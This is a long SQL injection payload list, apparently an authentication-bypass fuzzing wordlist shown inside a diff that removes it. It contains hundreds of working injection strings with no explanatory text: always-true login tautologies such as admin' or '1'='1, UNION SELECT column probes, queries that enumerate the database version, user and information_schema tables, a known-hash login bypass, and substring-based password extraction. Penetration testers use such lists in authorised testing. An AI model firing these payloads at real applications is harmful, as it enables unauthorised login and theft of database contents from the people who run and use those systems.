')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
